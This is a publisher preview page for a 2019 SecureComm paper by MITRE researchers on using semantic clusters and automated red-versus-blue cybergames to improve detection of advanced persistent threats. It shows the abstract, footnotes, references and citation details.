Closing the Gap with APTs Through Semantic Clusters and Automated Cybergames | SpringerLink
Skip to main content
Springer Nature Link
Log in

Closing the Gap with APTs Through Semantic Clusters and Automated Cybergames

  • Conference paper
  • First Online:
Security and Privacy in Communication Networks (SecureComm 2019)

Abstract

Defenders spend significant time interpreting low-level events while attackers, especially Advanced Persistent Threats (APTs), think and plan their activities at a higher strategic level. In this paper, we close this semantic gap by making the attackers’ strategy an explicit machine-readable component of intrusion detection. We introduce the concept of semantic clusters, which combine high-level technique and tactic annotations with a set of events providing evidence for those annotations. We then use a fully automated cybergaming environment, in which a red team is programmed to emulate APT behavior, to assess and improve defensive posture. Semantic clusters both provide the basis of scoring these cybergames and highlight promising defensive improvements. In a set of experiments, we demonstrate effective defensive adjustments which can be made using this higher-level information about adversarial strategy.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Log in via an institution

Subscribe and save

Springer+ Basic
¥17,985 /Month
  • Get 10 units per month
  • Download Article/Chapter or eBook
  • 1 Unit = 1 Article or 1 Chapter
  • Cancel anytime
Subscribe now

Buy Now

Chapter
JPY 3498
Price includes VAT (Japan)
  • Available as PDF
  • Read on any device
  • Instant download
  • Own it forever
eBook
JPY 5719
Price includes VAT (Japan)
  • Available as EPUB and PDF
  • Read on any device
  • Instant download
  • Own it forever
Softcover Book
JPY 7149
Price includes VAT (Japan)
  • Compact, lightweight edition
  • Dispatched in 3 to 5 business days
  • Free shipping worldwide - see info

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

Similar content being viewed by others

Notes

  1. 1.

    https://attack.mitre.org/wiki/Main_Page.

  2. 2.

    Ancillary techniques are used due to some semantic overlap in ATT&CK. For example, using a powershell command to dump credentials (T1003) could also be correctly labeled as an instance of execution via powershell (T1086).

  3. 3.

    Note that blue can report on the same red activity more than once if multiple sensors detect different aspects of the same red action. In this case, we only count one true positive.

  4. 4.

    We can apply the blue bot repeatedly to the same red activity because the blue bot does not alter the gameboard.

References

  1. ATT&CK: Adversarial Tactics, Techniques, and Common Knowledge. https://attack.mitre.org. Accessed 24 Apr 2019

  2. CAPEC: Common Attack Enumeration and Classification. https://capec.mitre.org. Accessed 24 Apr 2019

  3. CASCADE. https://github.com/mitre/cascade-server. Accessed 30 Apr 2019

  4. Cyber Analytics Repository. https://car.mitre.org/data_model/. Accessed 24 Apr 2019

  5. Endgame RTA: Red Team Automation. https://www.endgame.com/blog/technical-blog/introducing-endgame-red-team-automation. Accessed 24 Apr 2019

  6. First Round of MITRE ATT&CK Product Evaluations Released. https://medium.com/mitre-attack/first-round-of-mitre-att-ck-evaluations-released-15db64ea970d. Accessed 24 Apr 2019

  7. MANDIANT: Exposing One of China’s Cyber Espionage Units. https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf. Accessed 24 Apr 2019

  8. NSA/CSS Technical Cyber Threat Framework v2. https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/ctr-nsa-css-technical-cyber-threat-framework.pdf. Accessed 24 Apr 2019

  9. Red Canary ATT&CKs (Part 1): Why We’re Using ATT&CK Across Red Canary. https://redcanary.com/blog/red-canary-and-mitre-attack/. Accessed 24 Apr 2019

  10. Swift On Security - Sysmon Config. https://github.com/SwiftOnSecurity/sysmon-config. Accessed 24 Apr 2019

  11. Sysmon 9.0. https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon. Accessed 24 Apr 2019

  12. The Elasticsearch Common Schema. https://github.com/elastic/ecs/tree/master/schemas. Accessed 24 Apr 2019

  13. The Pyramid of Pain. http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html. Accessed 24 Apr 2019

  14. The SOC Gets a Makeover. https://www.darkreading.com/risk/the-soc-gets-a-makeover/d/d-id/1332744/. Accessed 24 Apr 2019

  15. Applebaum, A., Miller, D., Strom, B., Foster, H., Thomas, C.: Analysis of automated adversary emulation techniques. In: Summer Simulation Multi-Conference, p. 16 (2017)

    Google Scholar 

  16. Applebaum, A., Miller, D., Strom, B., Korban, C., Wolf, R.: Intelligent, automated red team emulation. In: 32nd Annual Conference on Computer Security Applications, pp. 363–373. ACM (2016)

    Google Scholar 

  17. Bodeau, D., McCollum, C., Fox, D.: Cyber threat modeling: survey, assessment, and representative framework. Tech. Rep. 16-J-00184-01, The MITRE Corporation: Homeland Security Systems Engineering and Development Institute (April 2018)

    Google Scholar 

  18. Ferguson, B., Tall, A., Olsen, D.: National cyber range overview. In: Military Communications Conference (MILCOM), 2014 IEEE, pp. 123–128. IEEE (2014)

    Google Scholar 

  19. Fletcher, T.A., Sharp, C., Raghavan, A.: Optimized common information model, US Patent App. 14/800,678 (2016)

    Google Scholar 

  20. Fox, D., McCollum, C., Arnoth, E., Mak, D.: Cyber wargaming: framework for enhancing cyber wargaming with realistic business context. Tech. Rep. 16-J-00184-04, The MITRE Corporation: Homeland Security Systems Engineering and Development Institute, November 2018

    Google Scholar 

  21. Goldis, P.D.: Questions and answers about tiger teams. EDPACS 17(4), 1–10 (1989)

    Article  Google Scholar 

  22. Hoffmann, J.: Simulated penetration testing: from dijkstra to turing test++. In: 25th International Conference on Automated Planning and Scheduling (2015)

    Google Scholar 

  23. Huang, X., Alleva, F., Hon, H.W., Hwang, M.Y., Lee, K.F., Rosenfeld, R.: The sphinx-ii speech recognition system: an overview. Comput. Speech & Lang. 7(2), 137–148 (1993)

    Article  Google Scholar 

  24. Kewley, D.L., Bouchard, J.F.: Darpa information assurance program dynamic defense experiment summary. IEEE Trans. Syst., Man, Cybern. - Part A: Syst. Hum. 31(4), 331–336 (2001)

    Article  Google Scholar 

  25. Milajerdi, S.M., Gjomemo, R., Eshete, B., Sekar, R., Venkatakrishnan, V.: Holmes: real-time apt detection through correlation of suspicious information flows. In: 2019 IEEE Symposium on Security and Privacy, pp. 430–445. IEEE (2019)

    Google Scholar 

  26. Niculae, S.: Reinforcement learning vs genetic algorithms in game-theoretic cyber-security, October 2018. thesiscommons.org/nxzep

  27. Oakley, J.: Improving cyber defensive stratagem through apt centric offensive security assessment. In: International Conference on Cyber Warfare and Security, pp. 552-XV. Academic Conferences International Limited (2018)

    Google Scholar 

  28. Oltsik, J., Alexander, C., CISM, C.: The life and times of cybersecurity professionals. ESG and ISSA: Research Report (2017)

    Google Scholar 

  29. Ošlejšek, R., Toth, D., Eichler, Z., Burská, K.: Towards a unified data storage and generic visualizations in cyber ranges. In: 16th European Conference on Cyber Warfare and Security. p. 298. Academic Conferences and publishing limited (2017)

    Google Scholar 

  30. Passerini, Emanuele, Paleari, Roberto, Martignoni, Lorenzo: How good are malware detectors at remediating infected systems? In: Flegel, Ulrich, Bruschi, Danilo (eds.) DIMVA 2009. LNCS, vol. 5587, pp. 21–37. Springer, Heidelberg (2009). https://doi.org/10.1007/978-3-642-02918-9_2

    Chapter  Google Scholar 

  31. Rieck, K., Trinius, P., Willems, C., Holz, T.: Automatic analysis of malware behavior using machine learning. J. Comput. Secur. 19(4), 639–668 (2011)

    Article  Google Scholar 

  32. Rossey, L.: Simspace cyber range. In: ACSAC 2015 Panel: Cyber Experimentation of the Future (CEF): Catalyzing a New Generation of Experimental Cyber-security Research (2015)

    Google Scholar 

  33. Rossey, L.M., et al.: Lariat: lincoln adaptable real-time information assurance testbed. In: Aerospace Conference, vol. 6, pp. 6–6. IEEE (2002)

    Google Scholar 

  34. Sarraute, C., Buffet, O., Hoffmann, J.: POMDPs make better hackers: accounting for uncertainty in penetration testing. In: 26th AAAI Conference on Artificial Intelligence (2012)

    Google Scholar 

  35. Silver, D., et al.: Mastering the game of go with deep neural networks and tree search. Nature 529(7587), 484 (2016)

    Article  Google Scholar 

  36. Sommer, R., Paxson, V.: Outside the closed world: on using machine learning for network intrusion detection. In: 2010 IEEE Symposium on Security and Privacy, pp. 305–316. IEEE (2010)

    Google Scholar 

  37. Trinius, P., Willems, C., Holz, T., Rieck, K.: A malware instruction set for behavior-based analysis (2009)

    Google Scholar 

  38. Van Dijk, M., Juels, A., Oprea, A., Rivest, R.L.: Flipit: The game of “stealthy takeover". J. Cryptol. 26(4), 655–713 (2013)

    Article  MathSciNet  Google Scholar 

  39. Wagner, D., Soto, P.: Mimicry attacks on host-based intrusion detection systems. In: 9th ACM Conference on Computer and Communications Security, pp. 255–264. ACM (2002)

    Google Scholar 

  40. Wood, B.J., Duggan, R.A.: Red teaming of advanced information assurance concepts. In: DARPA Information Survivability Conference and Exposition, pp. 112–118. IEEE (2000)

    Google Scholar 

Download references

Acknowledgements

We would like to thank Andy Applebaum for his helpful comments and suggestions reviewing this manuscript. We also want to acknowledge the generous support provided by the BRAWL, CALDERA, and CASCADE teams. This work was supported by a grant from the MITRE Innovation Program.

Author information

Authors and Affiliations

  1. The MITRE Corporation, McLean, VA, 22102, USA

    Steven Gianvecchio, Christopher Burkhalter, Hongying Lan, Andrew Sillers & Ken Smith

Authors
  1. Steven Gianvecchio
    View author publications

    You can also search for this author in PubMed Google Scholar

  2. Christopher Burkhalter
    View author publications

    You can also search for this author in PubMed Google Scholar

  3. Hongying Lan
    View author publications

    You can also search for this author in PubMed Google Scholar

  4. Andrew Sillers
    View author publications

    You can also search for this author in PubMed Google Scholar

  5. Ken Smith
    View author publications

    You can also search for this author in PubMed Google Scholar

Corresponding author

Correspondence to Steven Gianvecchio .

Editor information

Editors and Affiliations

  1. George Mason University, Fairfax, VA, USA

    Songqing Chen

  2. The University of Texas at San Antonio, San Antonio, TX, USA

    Kim-Kwang Raymond Choo

  3. Boston University, Lowell, MA, USA

    Xinwen Fu

  4. Virginia Tech, Blacksburg, VA, USA

    Wenjing Lou

  5. University of Central Florida, Orlando, FL, USA

    Aziz Mohaisen

Rights and permissions

Reprints and permissions

Copyright information

© 2019 ICST Institute for Computer Sciences, Social Informatics and Telecommunications Engineering

About this paper

Check for updates. Verify currency and authenticity via CrossMark

Cite this paper

Gianvecchio, S., Burkhalter, C., Lan, H., Sillers, A., Smith, K. (2019). Closing the Gap with APTs Through Semantic Clusters and Automated Cybergames. In: Chen, S., Choo, KK., Fu, X., Lou, W., Mohaisen, A. (eds) Security and Privacy in Communication Networks. SecureComm 2019. Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering, vol 304. Springer, Cham. https://doi.org/10.1007/978-3-030-37228-6_12

Download citation

  • DOI: https://doi.org/10.1007/978-3-030-37228-6_12

  • Published:

  • Publisher Name: Springer, Cham

  • Print ISBN: 978-3-030-37227-9

  • Online ISBN: 978-3-030-37228-6

  • eBook Packages: Computer ScienceComputer Science (R0)

Publish with us

Policies and ethics

Search

Navigation